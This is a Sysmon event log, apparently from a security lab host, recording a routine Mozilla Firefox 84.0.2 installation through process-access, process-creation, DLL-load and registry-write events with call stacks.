10341000x800000000000000016221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.146{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\nsExec.dll+149e(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\nsExec.dll+102b(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 154100x800000000000000016208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.131{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe84.0.2Mozilla Maintenance Service InstallerFirefoxMozilla Corporationmaintenanceservice_installer.exe"C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=78B4EB752D8B6860D7481323E86D5C4E,SHA256=AAA54F4FB3A04C11B735397F1DCEBC9D076A2E88A6FC3A8485C8A9206C37CA19,IMPHASH=E2A592076B17EF8BFB48B7E03965A3FC{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000016207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.130{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000016206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\nsExec.dll2021-01-18 13:59:53.114 13241300x800000000000000016205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.114{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\Applications\firefox.exe\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%%1" 13241300x800000000000000016204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Clients\StartMenuInternet\Firefox-308046B0AF4A39CB\shell\safemode\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode 13241300x800000000000000016203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Clients\StartMenuInternet\Firefox-308046B0AF4A39CB\shell\properties\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -preferences 13241300x800000000000000016202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Clients\StartMenuInternet\Firefox-308046B0AF4A39CB\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" 13241300x800000000000000016201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxURL-308046B0AF4A39CB\shell\open\ddeexec\(Default)(Empty) 13241300x800000000000000016200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxURL-308046B0AF4A39CB\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%%1" 13241300x800000000000000016199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxHTML-308046B0AF4A39CB\shell\open\ddeexec\(Default)(Empty) 13241300x800000000000000016198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1042SetValue2021-01-18 13:59:53.099{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKCR\FirefoxHTML-308046B0AF4A39CB\shell\open\command\(Default)"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "%%1" 13241300x800000000000000016197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.067{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 84.0.2 (x64 de)\URLUpdateInfohttps://www.mozilla.org/firefox/84.0.2/releasenotes 13241300x800000000000000016196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-PubSetValue2021-01-18 13:59:53.067{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 84.0.2 (x64 de)\PublisherMozilla 11241100x800000000000000016195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:53.052{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Users\ADMINI~1\AppData\Local\Temp\nssD439.tmp\AccessControl.dll2021-01-18 13:59:53.052 13241300x800000000000000016194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1122SetValue2021-01-18 13:59:53.036{59A5CD1D-9458-6005-2D05-00000000A301}1508C:\Windows\system32\regsvr32.exeHKCR\CLSID\{DCA8D857-1A63-4045-8F36-8809EB093D04}\InProcServer32\(Default)C:\Program Files\Mozilla Firefox\AccessibleHandler.dll 10341000x800000000000000016193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.036{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 